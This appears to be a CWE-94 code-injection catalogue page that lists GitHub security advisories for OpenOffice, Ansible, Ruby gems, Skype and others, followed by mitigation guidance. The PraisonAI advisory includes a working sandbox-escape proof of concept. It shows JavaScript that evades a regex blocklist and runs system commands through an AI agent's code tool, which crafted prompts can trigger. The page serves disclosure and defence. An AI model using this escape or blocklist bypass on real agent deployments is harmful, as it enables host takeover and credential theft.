Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8306 vulnerabilities reference this CWE, most recent first.

GHSA-P5VP-96H6-XQRG

Vulnerability from github – Published: 2022-05-02 03:43 – Updated: 2022-05-02 03:43
VLAI
Details

filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTSetBrc table property modifier in a Word document, related to a "boundary error flaw."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-3302"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2010-02-16T19:30:00Z",
    "severity": "HIGH"
  },
  "details": "filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTSetBrc table property modifier in a Word document, related to a \"boundary error flaw.\"",
  "id": "GHSA-p5vp-96h6-xqrg",
  "modified": "2022-05-02T03:43:49Z",
  "published": "2022-05-02T03:43:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3302"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=533043"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56241"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10022"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00005.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/38567"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/38568"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/38695"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/38921"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/41818"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/60799"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1023591"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2010/dsa-1995"
    },
    {
      "type": "WEB",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-201408-19.xml"
    },
    {
      "type": "WEB",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:221"
    },
    {
      "type": "WEB",
      "url": "http://www.openoffice.org/security/bulletin.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openoffice.org/security/cves/CVE-2009-3301-3302.html"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html"
    },
    {
      "type": "WEB",
      "url": "http://www.redhat.com/support/errata/RHSA-2010-0101.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/38218"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-903-1"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/cas/techalerts/TA10-287A.html"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2010/0366"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2010/0635"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2010/2905"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-P5X7-32HJ-QCXR

Vulnerability from github – Published: 2024-12-26 21:30 – Updated: 2024-12-26 21:30
VLAI
Details

TOTOLINK A3002R V4.0.0-B20230531.1404 is vulnerable to Remote Code Execution in /bin/boa via formWsc.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-54907"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-26T19:15:08Z",
    "severity": "HIGH"
  },
  "details": "TOTOLINK A3002R V4.0.0-B20230531.1404 is vulnerable to Remote Code Execution in /bin/boa via formWsc.",
  "id": "GHSA-p5x7-32hj-qcxr",
  "modified": "2024-12-26T21:30:36Z",
  "published": "2024-12-26T21:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54907"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MnrikSrins/totolink_A3002R_RCE"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P62G-JHG6-V3RQ

Vulnerability from github – Published: 2021-04-07 20:37 – Updated: 2024-11-18 16:26
VLAI
Summary
Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible
Details

A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.11, and 2.9.7 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ansible"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0a1"
            },
            {
              "fixed": "2.7.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ansible"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0a1"
            },
            {
              "fixed": "2.8.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ansible"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.9.0a1"
            },
            {
              "fixed": "2.9.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-10684"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-250",
      "CWE-362",
      "CWE-862",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-05T14:46:48Z",
    "nvd_published_at": "2020-03-24T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.11, and 2.9.7 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.",
  "id": "GHSA-p62g-jhg6-v3rq",
  "modified": "2024-11-18T16:26:11Z",
  "published": "2021-04-07T20:37:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10684"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ansible/ansible/commit/0b4788a71fc7d24ffa957a94ee5e23d6a9733ab0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ansible/ansible/commit/1d0d2645eed36ac4e17052ab4eacf240132d96fb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ansible/ansible/commit/5eabf7bb93c9bfc375b806a2b1f623d650cddc2b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10684"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-p62g-jhg6-v3rq"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ansible/ansible"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-207.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202006-11"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2021/dsa-4950"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible"
}

GHSA-P652-R243-C9CJ

Vulnerability from github – Published: 2022-05-14 02:36 – Updated: 2022-05-14 02:36
VLAI
Details

Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Uninitialized Pointer Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2010-2747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2010-10-13T19:00:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka \"Word Uninitialized Pointer Vulnerability.\"",
  "id": "GHSA-p652-r243-c9cj",
  "modified": "2022-05-14T02:36:42Z",
  "published": "2022-05-14T02:36:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2747"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-079"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7121"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/514310/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/cas/techalerts/TA10-285A.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-P655-2748-W2PM

Vulnerability from github – Published: 2022-05-01 23:31 – Updated: 2022-05-01 23:31
VLAI
Details

Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-0582"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-02-05T03:00:00Z",
    "severity": "MODERATE"
  },
  "details": "Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler.",
  "id": "GHSA-p655-2748-w2pm",
  "modified": "2022-05-01T23:31:43Z",
  "published": "2022-05-01T23:31:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-0582"
    },
    {
      "type": "WEB",
      "url": "http://aviv.raffon.net/2008/01/31/AttackersCanSkypeFindYou.aspx"
    },
    {
      "type": "WEB",
      "url": "http://www.kb.cert.org/vuls/id/794236"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/487370/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/27338"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-P65M-QR5X-RRQQ

Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2023-01-26 21:22
VLAI
Summary
Webbynode Code Injection vulnerability
Details

The message function in lib/webbynode/notify.rb in the Webbynode gem 1.0.5.3 and earlier for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a growlnotify message.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "webbynode"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-7086"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:48:09Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "The message function in `lib/webbynode/notify.rb` in the Webbynode gem 1.0.5.3 and earlier for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a growlnotify message.",
  "id": "GHSA-p65m-qr5x-rrqq",
  "modified": "2023-01-26T21:22:44Z",
  "published": "2017-10-24T18:33:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7086"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webbynode/webbynode/pull/85"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89705"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/webbynode/CVE-2013-7086.yml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/webbynode/webbynode"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20200229074410/http://www.securityfocus.com/bid/64289"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20201208124343/http://www.vapid.dhs.org/advisories/webbynode-command-inj.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/124421"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/oss-sec/2013/q4/493"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/oss-sec/2013/q4/497"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Webbynode Code Injection vulnerability"
}

GHSA-P65R-6GPP-MR6J

Vulnerability from github – Published: 2022-05-17 00:40 – Updated: 2022-05-17 00:40
VLAI
Details

PHP remote file inclusion vulnerability in _conf/_php-core/common-tpl-vars.php in PHPmyGallery 1.5 beta allows remote attackers to execute arbitrary PHP code via a URL in the admindir parameter, a different vector than CVE-2008-6317.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-6318"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-02-27T11:30:00Z",
    "severity": "HIGH"
  },
  "details": "PHP remote file inclusion vulnerability in _conf/_php-core/common-tpl-vars.php in PHPmyGallery 1.5 beta allows remote attackers to execute arbitrary PHP code via a URL in the admindir parameter, a different vector than CVE-2008-6317.",
  "id": "GHSA-p65r-6gpp-mr6j",
  "modified": "2022-05-17T00:40:16Z",
  "published": "2022-05-17T00:40:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-6318"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/7399"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/32723"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-P673-HJF2-PWFR

Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2023-07-03 23:38
VLAI
Summary
Shell command injection in command_wrap
Details

command_wrap.rb in the command_wrap Gem for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a URL or filename.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "command_wrap"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.6.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-1875"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:48:11Z",
    "nvd_published_at": "2013-03-20T22:55:00Z",
    "severity": "HIGH"
  },
  "details": "command_wrap.rb in the command_wrap Gem for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a URL or filename.",
  "id": "GHSA-p673-hjf2-pwfr",
  "modified": "2023-07-03T23:38:02Z",
  "published": "2017-10-24T18:33:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1875"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-p673-hjf2-pwfr"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/command_wrap/CVE-2013-1875.yml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/slicertje/commandwrap"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/120847/Ruby-Gem-Command-Wrap-Command-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2013/Mar/175"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2013/03/19/9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Shell command injection in command_wrap"
}

GHSA-P693-2VFQ-FPVW

Vulnerability from github – Published: 2021-12-16 00:02 – Updated: 2022-07-13 00:01
VLAI
Details

Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42310, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43882, CVE-2021-43889.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42311"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-15T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42310, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43882, CVE-2021-43889.",
  "id": "GHSA-p693-2vfq-fpvw",
  "modified": "2022-07-13T00:01:42Z",
  "published": "2021-12-16T00:02:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42311"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1556"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P69M-4F92-2V84

Vulnerability from github – Published: 2026-06-18 14:26 – Updated: 2026-06-18 14:26
VLAI
Summary
PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool
Details

Summary

The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function() with a with(sandbox) pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function('return this')() to recover the global object, followed by global.require() with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.

Details

Vulnerable code (lines 187–191):

const fn = new Function(
  'sandbox',
  `with (sandbox) { ${code} }`
);
const result = fn(sandbox);

The code parameter comes from LLM tool call arguments (the execute method at line 104). Before execution, a regex-based blocklist is applied (lines 108–136):

const blockedPatterns = [
  /require\s*\(\s*['"]child_process['"]\s*\)/,
  /require\s*\(\s*['"]fs['"]\s*\)/,
  /import\s+.*from\s+['"]child_process['"]/,
  /process\.exit/,
  /eval\s*\(/,
];

Three fundamental weaknesses:

  1. with(sandbox) does not provide isolation. The with statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets process: undefined and require: undefined, but these are recovered via the global scope: javascript const g = Function('return this')(); g.require('child_' + 'process')

  2. Blocklist evasion via string concatenation. The regex /require\s*\(\s*['"]child_process['"]\s*\)/ requires the literal string 'child_process' or "child_process" inside require(). Using require('child_' + 'process') bypasses this because the regex sees a variable concatenation, not a literal string.

  3. Function('return this')() is not blocked. None of the blocklist patterns match Function(, return this, or global.require.

PoC

Setup: Clean checkout at commit d5f1114a, Node.js v20.20.0 (tested environment).

Positive trigger — full RCE with sandbox escape (OBSERVED OUTPUT):

// This code bypasses ALL blocklist patterns and achieves RCE:
const code = `
const Func = (function(){}).constructor;
const proc = Func('return process')();
console.log('process.version:', proc.version);
const g = Function('return this')();
const mod = 'child_' + 'process';
const cp = g.require(mod);
console.log('RCE:', cp.execSync('id').toString().trim());
`;

Observed output (executed in this environment):

OUT: process.version: v20.20.0
OUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)

The escape was confirmed by executing the exact code-mode sandbox pattern (new Function('sandbox', 'with (sandbox) { ... }')) with the blocklist applied first. ALL blocklist patterns were bypassed, and the id command returned the real system user ID.

Negative control — blocklist correctly catches direct require:

const code = `require('child_process')`;
// Returns: "Blocked pattern detected: require\s*\(\s*['"]child_process['"]\s*\)"

Negative control — blocklist correctly catches eval:

const code = `eval('process')`;
// Returns: "Blocked pattern detected: eval\s*\("

Cleanup: No persistence needed; the code runs in-process.

Impact

An attacker who can influence the code parameter of the codeMode tool (via crafted prompts to an AI agent using praisonai-ts) achieves full arbitrary code execution on the host system. This includes:

  • Read/write any file accessible to the process user
  • Execute arbitrary system commands via child_process
  • Exfiltrate environment variables containing API keys, tokens, and credentials
  • Install persistent backdoors by writing to startup files
  • Move laterally in containerized environments

Suggested remediation

The with(sandbox) + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:

  1. Use vm module with proper context isolation:
import { createContext, runInContext } from 'vm';
const sandbox = createContext({ /* safe globals only */ });
runInContext(code, sandbox, { timeout: 5000 });
  1. Or use isolated-vm for true process-level isolation with separate V8 isolates.

  2. Or run code in a subprocess (like the Python _execute_code_sandboxed pattern already used in python_tools.py) with a clean environment and resource limits.

  3. If a blocklist approach must be retained, add patterns for:

  4. Function( / new Function
  5. constructor / __proto__ / prototype
  6. return this / return global
  7. global / globalThis / window But note: blocklist approaches are inherently fragile and will continue to have bypasses.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.7.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:26:37Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe `codeMode` tool in `src/praisonai-ts/src/tools/builtins/code-mode.ts` uses `new Function()` with a `with(sandbox)` pattern to execute LLM-generated code. The blocklist-based \"sandbox\" can be trivially bypassed via `Function(\u0027return this\u0027)()` to recover the global object, followed by `global.require()` with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.\n## Details\n**Vulnerable code (lines 187\u2013191):**\n```typescript\nconst fn = new Function(\n  \u0027sandbox\u0027,\n  `with (sandbox) { ${code} }`\n);\nconst result = fn(sandbox);\n```\n\nThe `code` parameter comes from LLM tool call arguments (the `execute` method at line 104). Before execution, a regex-based blocklist is applied (lines 108\u2013136):\n\n```typescript\nconst blockedPatterns = [\n  /require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/,\n  /require\\s*\\(\\s*[\u0027\"]fs[\u0027\"]\\s*\\)/,\n  /import\\s+.*from\\s+[\u0027\"]child_process[\u0027\"]/,\n  /process\\.exit/,\n  /eval\\s*\\(/,\n];\n```\n\n**Three fundamental weaknesses:**\n\n1. **`with(sandbox)` does not provide isolation.** The `with` statement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object sets `process: undefined` and `require: undefined`, but these are recovered via the global scope:\n   ```javascript\n   const g = Function(\u0027return this\u0027)();\n   g.require(\u0027child_\u0027 + \u0027process\u0027)\n   ```\n\n2. **Blocklist evasion via string concatenation.** The regex `/require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)/` requires the literal string `\u0027child_process\u0027` or `\"child_process\"` inside `require()`. Using `require(\u0027child_\u0027 + \u0027process\u0027)` bypasses this because the regex sees a variable concatenation, not a literal string.\n\n3. **`Function(\u0027return this\u0027)()` is not blocked.** None of the blocklist patterns match `Function(`, `return this`, or `global.require`.\n\n## PoC\n\n**Setup:** Clean checkout at commit `d5f1114a`, Node.js v20.20.0 (tested environment).\n\n**Positive trigger \u2014 full RCE with sandbox escape (OBSERVED OUTPUT):**\n```javascript\n// This code bypasses ALL blocklist patterns and achieves RCE:\nconst code = `\nconst Func = (function(){}).constructor;\nconst proc = Func(\u0027return process\u0027)();\nconsole.log(\u0027process.version:\u0027, proc.version);\nconst g = Function(\u0027return this\u0027)();\nconst mod = \u0027child_\u0027 + \u0027process\u0027;\nconst cp = g.require(mod);\nconsole.log(\u0027RCE:\u0027, cp.execSync(\u0027id\u0027).toString().trim());\n`;\n```\n\n**Observed output (executed in this environment):**\n```\nOUT: process.version: v20.20.0\nOUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)\n```\n\nThe escape was confirmed by executing the exact code-mode sandbox pattern (`new Function(\u0027sandbox\u0027, \u0027with (sandbox) { ... }\u0027)`) with the blocklist applied first. ALL blocklist patterns were bypassed, and the `id` command returned the real system user ID.\n\n**Negative control \u2014 blocklist correctly catches direct require:**\n```javascript\nconst code = `require(\u0027child_process\u0027)`;\n// Returns: \"Blocked pattern detected: require\\s*\\(\\s*[\u0027\"]child_process[\u0027\"]\\s*\\)\"\n```\n\n**Negative control \u2014 blocklist correctly catches eval:**\n```javascript\nconst code = `eval(\u0027process\u0027)`;\n// Returns: \"Blocked pattern detected: eval\\s*\\(\"\n```\n\n**Cleanup:** No persistence needed; the code runs in-process.\n\n## Impact\n\nAn attacker who can influence the `code` parameter of the `codeMode` tool (via crafted prompts to an AI agent using praisonai-ts) achieves **full arbitrary code execution** on the host system. This includes:\n\n- **Read/write any file** accessible to the process user\n- **Execute arbitrary system commands** via `child_process`\n- **Exfiltrate environment variables** containing API keys, tokens, and credentials\n- **Install persistent backdoors** by writing to startup files\n- **Move laterally** in containerized environments\n\n## Suggested remediation\n\nThe `with(sandbox)` + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:\n\n1. **Use `vm` module with proper context isolation:**\n```typescript\nimport { createContext, runInContext } from \u0027vm\u0027;\nconst sandbox = createContext({ /* safe globals only */ });\nrunInContext(code, sandbox, { timeout: 5000 });\n```\n\n2. **Or use `isolated-vm`** for true process-level isolation with separate V8 isolates.\n\n3. **Or run code in a subprocess** (like the Python `_execute_code_sandboxed` pattern already used in `python_tools.py`) with a clean environment and resource limits.\n\n4. If a blocklist approach must be retained, add patterns for:\n   - `Function(` / `new Function`\n   - `constructor` / `__proto__` / `prototype`\n   - `return this` / `return global`\n   - `global` / `globalThis` / `window`\n   But note: blocklist approaches are inherently fragile and will continue to have bypasses.",
  "id": "GHSA-p69m-4f92-2v84",
  "modified": "2026-06-18T14:26:37Z",
  "published": "2026-06-18T14:26:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-p69m-4f92-2v84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool"
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

